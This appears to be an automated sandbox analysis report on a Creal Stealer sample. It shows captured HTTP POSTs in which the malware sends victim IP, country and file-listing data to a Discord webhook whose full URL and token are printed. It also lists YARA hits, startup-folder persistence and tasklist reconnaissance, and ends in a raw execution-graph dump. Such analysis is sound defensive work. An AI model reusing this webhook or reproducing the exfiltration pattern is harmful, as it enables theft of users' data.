                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=trtfmFxbgMWAK.qOmD.5D69bzaMLpWJlYjpIXudPB4w-1727453966246-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0b89a654244-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:26 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                78192.168.2.849793162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:26 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 506
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:26 UTC506OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal | File Stealer"}, "footer": {"text": "Creal Stealer | ht
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:26 UTC1339INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:26 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=44217a347cec11efb64d42324cf1d653; Expires=Wed, 26-Sep-2029 16:19:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453968
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RhAmd%2BZgeZSXvXSe2c8EFXJmvH9xMs8ffRMvTWD%2BgpEDiVj1TMorvgpWqgrbsk7u1kL5Cf3ARtIvN%2FZ8Lnq2QFouNZ%2Bcmg7JmG5uG9tVZ%2BgnuBGdTLb6EXHf7MM0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=44217a347cec11efb64d42324cf1d6536764891083d930e3854fe40f90838770b3b087220fb7038ae92c001653b71c5a; Expires=Wed, 26-Sep-2029 16:19:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=6fc67678e78038628973969bbb16166b1bae5b34-1727453966; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:26 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 5a 37 4a 4b 7a 43 66 63 30 5f 32 54 58 75 4c 49 43 36 74 33 71 76 6d 6e 2e 50 48 48 66 52 54 70 47 4f 69 33 56 4d 4a 55 79 2e 55 2d 31 37 32 37 34 35 33 39 36 36 39 31 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 62 63 63 66 30 31 37 32 63 32 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=Z7JKzCfc0_2TXuLIC6t3qvmn.PHHfRTpGOi3VMJUy.U-1727453966910-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0bccf0172c2-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:26 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                79192.168.2.849794162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:27 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 506
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:27 UTC506OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal | File Stealer"}, "footer": {"text": "Creal Stealer | ht
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:27 UTC1359INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:27 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=4487f5667cec11ef93fb42324cf1d653; Expires=Wed, 26-Sep-2029 16:19:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453968
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LvdxsnH3VeoqPUjoomoUuU5c8X4zgMRKqnXawrANMhKwi6hhMdo5016rsX9NCYa6wykIQqKlxIU8ADnLaK42CVTwRiVl9J9124eWt428wUlCxaHoTqN9SAmm7D34"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=4487f5667cec11ef93fb42324cf1d653bd54605707d20d5da4787f34f71b3a8d76e986fb5ce1476f20fea179a32ef6d4; Expires=Wed, 26-Sep-2029 16:19:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=dff45fc3a172b052c868c8c498e3328f5153195d-1727453967; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:27 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 68 41 74 41 2e 44 4c 42 53 75 42 41 4a 67 37 44 76 61 34 58 43 64 47 35 2e 6a 58 6a 36 34 6d 41 48 70 57 51 5a 36 67 6c 59 6d 6b 2d 31 37 32 37 34 35 33 39 36 37 35 37 38 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 63 30 66 39 62 63 30 66 38 64 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=hAtA.DLBSuBAJg7Dva4XCdG5.jXj64mAHpWQZ6glYmk-1727453967578-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0c0f9bc0f8d-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:27 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                                                Start time:12:18:37
                                                                                                                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\HyZh4pn0RF.exe"
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff78f480000
                                                                                                                                                                                                                                                                                                File size:13'884'221 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:A4FD5040DB03F0C04306AB7824320269
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                                                                Start time:12:18:39
                                                                                                                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\HyZh4pn0RF.exe"
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff78f480000
                                                                                                                                                                                                                                                                                                File size:13'884'221 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:A4FD5040DB03F0C04306AB7824320269
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1783767443.000002539B464000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 00000002.00000003.1783368757.000002539B404000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                                                                Start time:12:18:41
                                                                                                                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff736240000
                                                                                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                                                                                Start time:12:18:41
                                                                                                                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                                                                                Start time:12:18:41
                                                                                                                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:tasklist
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff7d0ab0000
                                                                                                                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                                                                                Start time:12:18:55
                                                                                                                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe"
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff769320000
                                                                                                                                                                                                                                                                                                File size:13'884'221 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:A4FD5040DB03F0C04306AB7824320269
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                                                                                Start time:12:18:57
                                                                                                                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe"
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff769320000
                                                                                                                                                                                                                                                                                                File size:13'884'221 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:A4FD5040DB03F0C04306AB7824320269
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000000A.00000002.2012652158.000001F3E3C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000000A.00000003.1959532011.000001F3E36D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000000A.00000003.1958967533.000001F3E36A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000000A.00000003.1958731140.000001F3E3403000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000000A.00000003.1959293524.000001F3E36B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000000A.00000003.1958528378.000001F3E363E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                                                                                                Start time:12:18:59
                                                                                                                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff736240000
                                                                                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                                                                                Start time:12:18:59
                                                                                                                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                                                                                                Start time:12:18:59
                                                                                                                                                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                Commandline:tasklist
                                                                                                                                                                                                                                                                                                Imagebase:0x7ff7d0ab0000
                                                                                                                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                  Execution Coverage:11.9%
                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                  Signature Coverage:20.6%
                                                                                                                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:78
                                                                                                                                                                                                                                                                                                  execution_graph 15244 7ff78f499ef1 15256 7ff78f49a968 15244->15256 15261 7ff78f49b710 GetLastError 15256->15261 15262 7ff78f49b751 FlsSetValue 15261->15262 15263 7ff78f49b734 FlsGetValue 15261->15263 15265 7ff78f49b763 15262->15265 15280 7ff78f49b741 15262->15280 15264 7ff78f49b74b 15263->15264 15263->15280 15264->15262 15267 7ff78f49f158 _get_daylight 11 API calls 15265->15267 15266 7ff78f49b7bd SetLastError 15268 7ff78f49a971 15266->15268 15269 7ff78f49b7dd 15266->15269 15270 7ff78f49b772 15267->15270 15283 7ff78f49aa9c 15268->15283 15273 7ff78f49aa9c __CxxCallCatchBlock 38 API calls 15269->15273 15271 7ff78f49b790 FlsSetValue 15270->15271 15272 7ff78f49b780 FlsSetValue 15270->15272 15275 7ff78f49b79c FlsSetValue 15271->15275 15276 7ff78f49b7ae 15271->15276 15274 7ff78f49b789 15272->15274 15277 7ff78f49b7e2 15273->15277 15278 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15274->15278 15275->15274 15279 7ff78f49b4b8 _get_daylight 11 API calls 15276->15279 15278->15280 15281 7ff78f49b7b6 15279->15281 15280->15266 15282 7ff78f49af0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15281->15282 15282->15266 15292 7ff78f4a3cc0 15283->15292 15326 7ff78f4a3c78 15292->15326 15331 7ff78f4a0cb8 EnterCriticalSection 15326->15331 19663 7ff78f4aaaf4 19666 7ff78f495378 LeaveCriticalSection 19663->19666 16107 7ff78f49fcec 16108 7ff78f49fede 16107->16108 16110 7ff78f49fd2e _isindst 16107->16110 16109 7ff78f4954c4 _get_daylight 11 API calls 16108->16109 16127 7ff78f49fece 16109->16127 16110->16108 16113 7ff78f49fdae _isindst 16110->16113 16111 7ff78f48bcc0 _wfindfirst32i64 8 API calls 16112 7ff78f49fef9 16111->16112 16128 7ff78f4a6904 16113->16128 16118 7ff78f49ff0a 16120 7ff78f49aec4 _wfindfirst32i64 17 API calls 16118->16120 16122 7ff78f49ff1e 16120->16122 16125 7ff78f49fe0b 16125->16127 16153 7ff78f4a6948 16125->16153 16127->16111 16129 7ff78f49fdcc 16128->16129 16130 7ff78f4a6913 16128->16130 16135 7ff78f4a5d08 16129->16135 16160 7ff78f4a0cb8 EnterCriticalSection 16130->16160 16136 7ff78f4a5d11 16135->16136 16140 7ff78f49fde1 16135->16140 16137 7ff78f4954c4 _get_daylight 11 API calls 16136->16137 16138 7ff78f4a5d16 16137->16138 16139 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 16138->16139 16139->16140 16140->16118 16141 7ff78f4a5d38 16140->16141 16142 7ff78f4a5d41 16141->16142 16143 7ff78f49fdf2 16141->16143 16144 7ff78f4954c4 _get_daylight 11 API calls 16142->16144 16143->16118 16147 7ff78f4a5d68 16143->16147 16145 7ff78f4a5d46 16144->16145 16146 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 16145->16146 16146->16143 16148 7ff78f4a5d71 16147->16148 16149 7ff78f49fe03 16147->16149 16150 7ff78f4954c4 _get_daylight 11 API calls 16148->16150 16149->16118 16149->16125 16151 7ff78f4a5d76 16150->16151 16152 7ff78f49aea4 _invalid_parameter_noinfo 37 API calls 16151->16152 16152->16149 16161 7ff78f4a0cb8 EnterCriticalSection 16153->16161 19139 7ff78f4aa96e 19140 7ff78f4aa97e 19139->19140 19143 7ff78f495378 LeaveCriticalSection 